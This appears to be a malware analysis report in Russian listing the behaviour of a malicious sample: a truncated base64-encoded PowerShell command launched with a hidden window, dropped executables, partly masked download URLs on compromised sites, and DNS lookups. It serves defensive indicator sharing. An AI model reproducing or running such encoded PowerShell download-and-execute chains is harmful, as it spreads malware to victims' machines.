Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABLAHgAZgBjAGsAZQBpAGEAZAB2AGgAcwA9ACcASQBlAHYAcQBqAHAAeABvAG0AZABkACcAOwAkAEEAcABwAG0AZAByAGkAZwBqAHkAdgBzACAAPQAgACcANAAzADAAJwA7ACQAQQB5AHgAdwBmAG8AegBpAHAAbgBtAHQAPQAnAEwAdQBmAGwAZgBzAH...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 2012
- %TEMP%\1092584.cvr
- %HOMEPATH%\430.exe
- %HOMEPATH%\430.exe
- 'vo#.#tf-fce.ca':80
- 'ct##fce.ca':443
- 'ut#####handghoomo.com':80
- 'to####panies.news':80
- 'to####panies.news':443
- http://vo#.#tf-fce.ca/wp-admin/b6wz7k-uslmy0-653291408/
- http://www.ut#####handghoomo.com/profileo/usj67u8-cegmzn-12876682/
- http://www.ut#####handghoomo.com/cgi-sys/suspendedpage.cgi
- http://www.to####panies.news/wp-content/FDRqWVwVL/
- 'vo#.#tf-fce.ca':443
- 'to####panies.news':443
- DNS ASK tx####l.50cms.com
- DNS ASK ra###.##xitaaparrels.com
- DNS ASK vo#.#tf-fce.ca
- DNS ASK ct##fce.ca
- DNS ASK ut#####handghoomo.com
- DNS ASK to####panies.news
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABLAHgAZgBjAGsAZQBpAGEAZAB2AGgAcwA9ACcASQBlAHYAcQBqAHAAeABvAG0AZABkACcAOwAkAEEAcABwAG0AZAByAGkAZwBqAHkAdgBzACAAPQAgACcANAAzADAAJwA7ACQAQQB5AHgAdwBmAG8AegBpAHAAbgBtAHQAPQAnAEwAdQBmAGwAZgBzAH...' (со скрытым окном)